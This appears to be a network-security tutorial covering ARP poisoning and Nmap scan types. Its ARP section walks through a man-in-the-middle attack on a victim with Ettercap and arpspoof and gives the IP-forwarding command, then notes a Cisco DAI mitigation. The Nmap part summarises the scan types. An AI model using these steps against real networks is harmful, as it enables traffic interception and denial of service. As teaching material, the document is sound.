Arp Poisoning :

also known as ARP Poison Routing, is a network attack that exploits the transition from Layer 3 to Layer 2 addresses.

ARP (address resolution protocol) operates by broadcasting a message across a network, to determine the Layer 2 address (MAC address) of a host with a predefined Layer 3 address (IP address). The host at the destination IP address sends a reply packet containing its MAC address. Once the initial ARP transaction is complete, the originating device then caches the ARP response, which is used within the Layer 2 header of packets that are sent to a specified IP address. An ARP Spoofing attack is the egression of unsolicited ARP messages. These ARP messages contain the IP address of a network resource, such as the default gateway, or a DNS server, and replaces the MAC address for the corresponding network resource with its own MAC address. Network devices, by design, overwrite any existing ARP information in conjunction with the IP address, with the new, counterfeit ARP information. The attacker then takes the role of man in the middle; any traffic destined for the legitimate resource is sent through the attacking system. As this attack occurs on the lower levels of the OSI model, the end-user is oblivious to the attack occurrence. ARP Poisoning is also capable of executing Denial of Service (DoS) attacks. The attacking system, instead of posing as a gateway and performing a man in the middle attack, can instead simply drop the packets, causing the clients to be denied service to the attacked network resource. The spoofing of ARP messages is the tributary principal of ARP Poisoning. Attack Vector Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. Arpspoof is a tool that can send fake arp reply in network in one go.Its a small and a very powerful tool.

Arp Poisoning

Above figure show the scenario over which we will be performing arp poisoning using ettercap and arpspoof tools.

Attack:
Step 1:In this step we first look for ipv4 address and MAC address of victim.

Step 2:Now here we will launch our attack by firing ettercap in command mode.

Same can be done using arpspoof as shown below:

Step 3:See in host list of ettercap that whether the victim is added as a target for arpspoofing or not.

Step 4:Now victim is poisoned as you can see in figure that gateway MAC is same as of attackers machine MAC.

Step 5:Do another little check to make sure that data is going through victim to gateway.

To make Our attacker machine a router so that he can pass the data requested by victim to the victim which attacker will receive from gateway by acting as a man in middle we have to run following command in attacker machine so that he can forward packets. echo 1 > /proc/sys/net/ipv4/ip_forward

Mitigation:
Mitigation of ARP Poisoning can be performed on the Cisco IOS with DAI (DYNAMIC ARP INSPECTION) which is relying on DHCP Snooping. Enable DAI ip arp inspection vlan <Vlan ID> Enable DHCP snooping

Nmap
Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap Help Manual

TYPE OF SCANS
Syn Scan SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms as Nmap's FIN/NULL/Xmas, Maimon and idle scans do. It also allows clear, reliable differentiation between the open, closed, and filtered states.

TCP Scan TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection.

Fin,Null and Xmas Scan These three scan types (even more are possible with the --scanflags option described in the next section) exploit a subtle loophole in the TCP RFC to differentiate between open and closed ports. Page 65 of RFC 793 says that if the [destination] port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response. Then the next page discusses packets sent to open ports without the SYN, RST, or ACK bits set, stating that: you are unlikely to get here, but if you do, drop the segment, and return. When scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will result in a returned RST if the port is closed and no response at all if the port is open. As long as none of those three bits are included, any combination of the other three (FIN, PSH, and URG) are OK. Nmap exploits this with three scan types Xmas scan sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

ACK and UDP Scan ACK scan(-sA) is different than the others discussed so far in that it never determines open (or even open|filtered) ports. It is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered. The ACK scan probe packet has only the ACK flag set (unless you use --scanflags). When scanning unfiltered systems, open and closed ports will both return a RST packet. UDP scan(-sU) works by sending a UDP packet to every targeted port. For some common ports such as 53 and 161, a protocol-specific payload is sent, but for most ports the packet is empty. The --datalength option can be used to send a fixed-length random payload to every port or (if you specify a value of 0) to disable payloads. If an ICMP port unreachable error (type 3, code 3) is returned, the port is closed. Other ICMP unreachable errors (type 3, codes 1, 2, 9, 10, or 13) mark the port as filtered. Occasionally, a service will respond with a UDP packet, proving that it is open. If no response is received after retransmissions, the port is classified as open|filtered. This means that the port could be open, or perhaps packet filters are blocking the communication. Version detection (sV) can be used to help differentiate the truly open ports from the filtered ones.

Version Detection Scan It can be used to help differentiate the truly open ports from the filtered ones.

10

Available Options in Nmap

11

12